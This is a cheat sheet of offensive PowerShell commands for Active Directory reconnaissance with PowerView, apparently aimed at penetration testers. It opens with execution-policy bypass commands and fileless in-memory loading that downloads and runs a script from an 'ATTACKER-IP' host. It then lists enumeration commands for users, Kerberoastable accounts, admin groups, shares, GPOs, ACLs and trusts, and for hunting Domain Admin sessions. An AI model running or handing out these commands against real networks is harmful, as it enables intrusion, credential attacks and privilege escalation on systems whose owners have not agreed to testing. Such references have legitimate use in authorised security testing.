๐Ÿ›ก๏ธ PowerShell Execution Policy Bypass

Allows running unsigned PowerShell scripts in the current process.
powershell -ep bypass
Start a new PowerShell with the bypass policy and without loading profile scripts.
powershell.exe -ExecutionPolicy Bypass -NoProfile
Execute PowerView in memory (fileless execution).
powershell -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')"

📥 Loading PowerView

Start a temporary HTTP server on the attacker machine.
python3 -m http.server 80
Load PowerView directly into memory.
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/PowerView.ps1')
Download the script locally.
Invoke-WebRequest http://ATTACKER-IP/PowerView.ps1 -OutFile PowerView.ps1
Import the module.
Import-Module .\PowerView.ps1
Check which command naming is available (new Get-Domain* functions or legacy Get-Net* functions).
Get-Command *Domain*
Get-Command *Net*

๐Ÿ” Domain Enumeration

Get general domain information.
Get-Domain
Retrieve the domain SID.
Get-DomainSID
List domain policies.
Get-DomainPolicy
Show password & lockout policy.
(Get-DomainPolicy)."SystemAccess"
Show Kerberos configuration.
(Get-DomainPolicy)."KerberosPolicy"
List domain controllers.
Get-DomainController
Legacy (old PowerView):
Get general domain information.
Get-NetDomain
Retrieve the domain SID.
Get-NetDomainSID
List domain policies.
Get-NetDomainPolicy
List domain controllers.
Get-NetDomainController

👤 User Enumeration

List domain users.
Get-DomainUser
Detailed information about a user.
Get-DomainUser -Identity <user> -Properties *
Find Kerberoastable accounts (SPN users).
Get-DomainUser -SPN
Identify privileged/protected accounts.
Get-DomainUser -AdminCount
Accounts trusted for delegation.
Get-DomainUser -TrustedToAuth
Check logged-on users on a machine.
Get-NetLoggedon -ComputerName <computer>
Legacy (old PowerView):
List domain users.
Get-NetUser
Get specific user information.
Get-NetUser -UserName <user>
Find Kerberoastable accounts.
Get-NetUser -SPN
Find privileged accounts.
Get-NetUser -AdminCount

💻 Computer Enumeration

List domain computers.
Get-DomainComputer
Find servers only.
Get-DomainComputer -OperatingSystem "*Server*"
Last logged-on user of a machine.
Get-LastLoggedOn -ComputerName <computer>
Legacy (old PowerView):
List domain computers.
Get-NetComputer
Find servers only.
Get-NetComputer -OperatingSystem "*Server*"

👥 Group Enumeration

List domain groups.
Get-DomainGroup
Find administrative groups.
Get-DomainGroup *admin*
List group members.
Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Find groups a user belongs to.
Get-DomainGroup -UserName <user>
Legacy (old PowerView):
List domain groups.
Get-NetGroup
List members of a group.
Get-NetGroupMember -GroupName "Domain Admins"

📂 Share Enumeration

Find domain shares.
Find-DomainShare
Find accessible shares.
Find-DomainShare -CheckShareAccess
Legacy (old PowerView):
Find network shares.
Invoke-ShareFinder
Locate file servers in the domain.
Get-NetFileServer

🧾 GPO Enumeration

List Group Policy Objects.
Get-DomainGPO
GPO applied to a computer.
Get-DomainGPO -ComputerName <computer>
Machines where GPO grants admin rights.
Find-GPOComputerAdmin -ComputerName <computer>
Where a user has admin rights via GPO.
Find-GPOLocation -Identity <user>
Legacy (old PowerView):
List Group Policy Objects.
Get-NetGPO

๐Ÿข OU Enumeration

List organizational units.
Get-DomainOU
Legacy (old PowerView):
List organizational units.
Get-NetOU

๐Ÿ” ACL Enumeration

View permissions on AD objects.
Get-DomainObjectAcl -Identity <object> -ResolveGUIDs
Find interesting ACLs (potential privilege escalation paths).
Invoke-ACLScanner -ResolveGUIDs
Legacy (old PowerView):
View permissions on AD objects.
Get-ObjectAcl -SamAccountName <object>

🔗 Trust Enumeration

Enumerate domain trusts.
Get-DomainTrust
Map trust relationships.
Get-DomainTrustMapping
Legacy (old PowerView):
Enumerate domain trusts.
Get-NetDomainTrust

🌲 Forest Enumeration

Get forest information.
Get-Forest
List forest domains.
Get-ForestDomain
List global catalog servers.
Get-ForestGlobalCatalog
Legacy (old PowerView):
Get forest information.
Get-NetForest
List forest domains.
Get-NetForestDomain

🎯 Privilege Escalation / Hunting

Find machines where current user is local admin.
Find-LocalAdminAccess
Find machines where privileged users (Domain Admins by default) have active sessions.
Invoke-UserHunter
Enumerate local administrators across domain.
Invoke-EnumerateLocalAdmin
Find unconstrained delegation systems.
Get-DomainComputer -Unconstrained
Legacy (old PowerView):
Find unconstrained delegation systems.
Get-NetComputer -Unconstrained